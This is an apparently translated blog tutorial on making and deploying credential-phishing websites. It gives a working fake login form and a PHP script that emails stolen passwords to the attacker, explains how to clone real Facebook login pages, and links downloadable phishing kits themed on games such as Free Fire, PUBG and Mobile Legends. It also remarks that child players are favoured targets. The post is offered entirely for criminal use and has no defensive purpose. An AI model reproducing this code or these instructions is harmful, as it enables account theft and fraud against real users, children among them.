Phishing Script: Definition, How to Create, and Download

If you like making phishing webs, then you must be familiar with the phishing script.

Almost 90% of phisers will google the script to get the latest version. Even though we can edit it ourselves by changing the image, text or code.

I myself also rely more on google, because it’s easier. But sadly, not all scripts send mail.

Therefore, we must be able to tinker with it ourselves so that the appearance of phishing is satisfactory.

In this post I will discuss starting from understanding, how to make it, to the editing process belonging to other people. In addition, I will also share the download file for free.

Alright, let’s learn more.

What is a phishing script?

A phishing script is a collection of files and folders to set up a phishing page starting from the appearance, login method and how it works so that it can trick people who access it.

The files and folders are html, php and css codes like on the website. Then everything will be compressed into a zip or rar for easy uploading.

the contents of the phishing script file

There are many scripts with different views. It is based on what platform or game is being targeted.

Example :

You want to make a free fire phishing web, then you have to upload a script with a ff game display.

Actually 1 script can be used to create various kinds of phishing, such as fb, ff, pubg, ml, etc.

It’s just that, we have to edit the appearance according to what phishing we will make.

Alright, after understanding we move on to how it works.

How phishing scripts work

In order to work, we have to upload the script file to the hosting. In addition, we also have to specify a domain name in order to see how it looks.

Maybe you guys already understand, so I won’t discuss how to upload it to hosting.

Let’s get straight to how it works:

First, the script will display a selection of attractive prizes/services. For example, the choice of free diamonds, free skins, joining the xx group, or free credit.

Second, Visitors (victims) will see a login page after selecting a gift/offer. This is a fake login page that can save every data entered.

Third, the script will send the saved data to the listed email. In the script there is a file that functions to perform automatic delivery if there is incoming data.

In short, the script only requires an account email & password. It will then send it to the listed email.

Got it, right?

If not, please see how the process of making it.

What is the process of creating a phishing script?

The main thing is that we have to create some files that contain certain code. Then link each file to work in order.

Example :

When clicking a link on file A, it should point to file B. When file B receives a command, then file C should run automatically.

I’ve made code with a view like this:

simple login page

Then I have also created a file to set the automatic email.

phishing results from php code

For the process of creating files and coding, I use a quick edit application. You can download it from playstore.

Alright, now I will give an example of the creation process with a simple code.

Here’s how to make a phishing script with simple code

1. Create a login page for filling in your email and password

Create a file with the extension .html then fill it with the following code:

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Test Send Mail</title>
  </head>
  <body>
    <h2>Test Send Mail</h2>
    <form action="proses.php" method="post">
      <input type="text" name="email" placeholder="Masukan email">
      <input type="password" name="password" placeholder="Masukan password">
      <button type="submit" name="submit">Login</button>
    </form>
  </body>
</html>

The trick, open the quick edit application then enter the code that I have included. Then press the folder icon and select “save as”. Finally, write the file name ending in .html.

Example: index.html

2. Create a file for automatic email sending

This file is useful for sending every incoming data on the login page to email.

You have to create this file with the name process.php because it is already listed in the previous code file.

If you want to use another name, you have to change the code

with the current name.

For example, the file name is email.php, so the code becomes

Please fill in the automatic email sender file with the following code:

<?php
$email = $_POST['email'];
$password = $_POST['password'];
if (empty($email) && empty($password)) {
  header('location: ./');
} else {
$message = "
Email : ".$email."
Password : ".$password."
";

$emailmu = "[email protected]"; // Email tujuanmu disini
$subject = "Tumbal From [ ".$email." ]";
$headers="From: XNULL <[email protected]>" . "rn";
mail($emailmu, $subject, $message, $headers);
header('location: https://google.com');
}
?>

Note: replace [email protected] with your email to receive phishing results.

3. Compress all files into one

This aims to simplify the process of uploading to hosting. Because if the files are separate, it can take a long time to upload them.

In addition, other people can also download files easily.

You have to compress all files into one with zip or rar extension. Use an app like zarchiver to help with the process.

Well, until here the manufacturing process is complete. The next step is to upload it to the hosting so you can see how it looks.

Tips to make the script look good

You just copy a page by copying the html code and then editing it.

To make it easier, do it that way using a computer. Then do an element inspection to see the page code.

inspect the page to see the source code

Copy all the code and paste it into a new file. Don’t forget to do some editing too.

Example :

You want to create a facebook login page. Then copy all the code from that page then replace the link on the login button to run the email sender file.

Making your own is not easy, so I will share a ready-to-use phishing script below.

Download the latest phishing script

I will share some script files by categorizing them so that it is easier for you to download which one.

Apart from google drive, I will also include a download link from dropbox. All of them do not use shortlinks / loose links, so the download process is faster.

How to download it, just click the link listed, the file will automatically be saved immediately.

The following is a collection of phishing scripts and their download links:

phishing script ff 2022

Free fire is a very popular game, this is evident from the number of downloads that reach 500+ million. Besides that, most of the players in this game are little kids, so many phisers are hunting for them.

For appearance there are 4 options, namely:

1. Crazy Bunny

phishing script ff crazy bunny

File size : 6mb

Download links:

https://www.dropbox.com/s/0hkr4esvfpdv3fq/Crazy%20Bunny%20by%20omcyber.com.zip?dl=1

2. Lucky spin

phishing script ff lucky spin

File size : 5mb

Download links:

https://www.dropbox.com/s/e5tveb8qvsw6d1q/Lucky%20Spin%20by%20omcyber.com.zip?dl=1

3. Diamond Unipin

script phishing ff diamond unipin

File size : 3mb

Download links:

https://www.dropbox.com/s/5twgkf6bbyl019i/Unipin-FF%20by%20omcyber.com.zip?dl=1

4. Incubator

phishing script ff incubator

File size : 3mb

Download link:

https://www.dropbox.com/s/1jua6gnipw6wkvw/Incubator%20Galaxy%20by%20omcyber.com.zip?dl=1

fb phishing script

For Facebook, you can also use the previous free fire file. Because ff login also uses a facebook account.

But to get a different view, I’ve included the following files:

1. Free credit true login fb

phishing script fb credit free

File size : 27kb

Download link:

https://www.dropbox.com/s/mtlz3j1k86ul74c/Phising%20pulsa%20gratis%20real%20login%20by%20omcyber.com.zip?dl=1

2. Watch movie 21

phishing script fb watching movie 21

File size: 300kb

Download links:

https://www.dropbox.com/s/osvqwq67f8mr6rp/Nonton%20Film%2022%20by%20omcyber.zip?dl=1

3. Facebook auto-like

phishing script fb autolike

File size: 150kb

Download links:

https://www.dropbox.com/s/1lday5ju40ut1bp/Script%20Phising%20Auto%20Like%20by%20omcyber.com.zip?dl=1

PUBG Mobile phishing script

This Pubg script has several account login views, such as Facebook, Google, and Twitter.

There are 2 versions of the display that you can choose, namely:

1. Season 7 new style

pubg season 7 phishing script

File size : 7mb

Download links:

https://drive.google.com/uc?export=download&id=1Mh0d_yia3g8ngYs4Cxwzn1RAWHXZU5uE

2. All on one page

picture

File size : 6mb

Download links:

https://drive.google.com/uc?export=download&id=1xKMH-vg0wnfozJMrubwXIxjaL43Qz5iZ

Mobile legends phishing script

Mobile legend theme is the file that I will share last. Because this game is already less popular than ff & pubg mobile.

The views that I will include are like free diamonds, free skins, fake lucky spins. Please just download it directly.

1. Skin legend

phishing script mobile legends skin legend

File size : 3mb

Download links:

https://drive.google.com/uc?export=download&id=1qR62ZffyWyaS6EX-bN8JFLfbRlk2Ods4

2. Fake lucky spin

phishing script mobile legend lucky spin

File size : 2mb

Download links:

https://drive.google.com/uc?export=download&id=1o3qC9cTuo7b37b9us_qSO6hvOyNog3vt

Okay, please download which script looks good then upload it to your respective hosting.

Next I will share tips on how to change the appearance of the script according to our own wishes.

How to edit a ready-made phishing script

All scripts have the same way of working, it’s just different in the initial appearance. Therefore, to get the latest version of the script, we just need to change the display image.

In short, we only need to change the front page only.

How to?

First, find the file in the script with the name index.html/index.php. It is the file that displays the front page of the script.

Secondopen the file then look for the code that contains img url/ img source. You delete the url and replace it with the new image url.

Example :

<link rel="icon" type="img/png" href="https://omcyber.com/script-phising/overseas-img.qq.com/images/pubgmobile/act/a20220107point/icon_logo.png" />

You see the code img/png then look at the code next to it (image address). Replace the link with a new image link to change the appearance of the script.

Notes:
You have to upload the image file to the internet in order to get the link. Can be to mediafire, drive or other online storage media.

Conclusion

Thus the discussion about the phishing script, hopefully it can be useful and add to your insight.

In essence, the script itself is a collection of files to manage the appearance of the website. But because the website is phishing, it must be made as attractive as possible so that people who see it become curious.

Thanks for reading.

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *